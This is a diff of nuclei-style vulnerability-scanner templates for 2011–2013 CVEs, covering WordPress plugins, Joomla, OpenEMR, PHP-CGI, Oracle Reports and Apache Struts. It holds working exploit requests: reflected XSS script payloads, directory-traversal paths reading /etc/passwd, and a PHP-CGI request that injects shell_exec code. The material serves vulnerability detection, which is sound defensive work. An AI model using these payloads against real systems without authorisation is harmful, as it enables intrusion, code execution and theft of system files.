name: Tiki Wiki CMS Groupware 7.0 has XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
|
||||
- https://www.securityfocus.com/bid/48806/info
|
||||
- https://seclists.org/bugtraq/2011/Nov/140
|
||||
tags: cve,cve2011,xss,tikiwiki
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4618
|
||||
|
||||
info:
|
||||
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4624
|
||||
|
||||
info:
|
||||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-4804
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36598
|
||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||
tags: cve,cve2011,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-4926
|
||||
|
||||
info:
|
||||
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5106
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5107
|
||||
|
||||
info:
|
||||
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5179
|
||||
|
||||
info:
|
||||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5181
|
||||
|
||||
info:
|
||||
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2011-5265
|
||||
|
||||
info:
|
||||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
|
||||
tags: cve,cve2011,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Struts2 S2-008 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
|
||||
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
|
||||
tags: cve,cve2012,apache,rce,struts
|
||||
|
||||
|
@ -17,7 +18,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-0901
|
||||
|
||||
info:
|
||||
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0991
|
||||
|
||||
info:
|
||||
name: OpenEMR 4.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36650
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||
tags: cve,cve2012,lfi,openemr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2012-1823
|
||||
|
||||
info:
|
||||
name: PHP CGI v5.3.12/5.4.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
|
||||
description: |
|
||||
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
|
||||
tags: rce,php,cve,cve2012
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 31
|
||||
|
||||
<?php echo shell_exec("cat /etc/passwd"); ?>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2012-1835
|
||||
|
||||
info:
|
||||
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-2371
|
||||
|
||||
info:
|
||||
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2012-3153
|
||||
|
||||
info:
|
||||
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
|
||||
author: Sid Ahmed MALAOUI @ Realistic Security
|
||||
severity: critical
|
||||
description: |
|
||||
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
|
||||
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
|
||||
vectors related to Report Server Component.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
|
||||
- https://www.exploit-db.com/exploits/31737
|
||||
tags: cve,cve2012,oracle,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/reports/rwservlet/showenv"
|
||||
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_1, "Reports Servlet")'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(body_2, "<html")'
|
||||
- '!contains(body_2, "<HTML")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: windows_working_path
|
||||
regex:
|
||||
- ".?.?\\\\.*\\\\showenv"
|
||||
- type: regex
|
||||
name: linux_working_path
|
||||
regex:
|
||||
- "/.*/showenv"
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2012-4242
|
||||
|
||||
info:
|
||||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-4253
|
||||
|
||||
info:
|
||||
name: MySQLDumper 1.24.4 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37129
|
||||
- https://www.cvedetails.com/cve/CVE-2012-4253
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-4273
|
||||
|
||||
info:
|
||||
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-4768
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-4878
|
||||
|
||||
info:
|
||||
name: FlatnuX CMS - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37034
|
||||
- https://www.cvedetails.com/cve/CVE-2012-4878
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2012-4889
|
||||
|
||||
info:
|
||||
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/bid/52841/info
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
||||
tags: cve,cve2012,xss,manageengine
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-5913
|
||||
|
||||
info:
|
||||
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache Struts2 S2-012 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
|
||||
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
|
||||
reference: http://struts.apache.org/development/2.x/docs/s2-012.html
|
||||
tags: cve,cve2013,apache,rce,struts
|
||||
|
||||
requests:
|
||||
|
@ -21,7 +22,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2013-2248
|
||||
|
||||
info:
|
||||
name: Apache Struts - Multiple Open Redirection Vulnerabilities
|
||||
author: 0x_Akoko
|
||||
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
reference: https://www.exploit-db.com/exploits/38666
|
||||
severity: low
|
||||
tags: cve,cve2013,apache,redirect,struts
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -2,9 +2,10 @@ id: CVE-2013-2251
|
|||
|
||||
info:
|
||||
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
||||
author: exploitation & @dwisiswant0
|
||||
author: exploitation,dwisiswant0,alex
|
||||
severity: critical
|
||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
||||
tags: cve,cve2013,rce,struts,apache
|
||||
|
||||
requests:
|
||||
|
@ -28,6 +29,13 @@ requests:
|
|||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
- |
|
||||
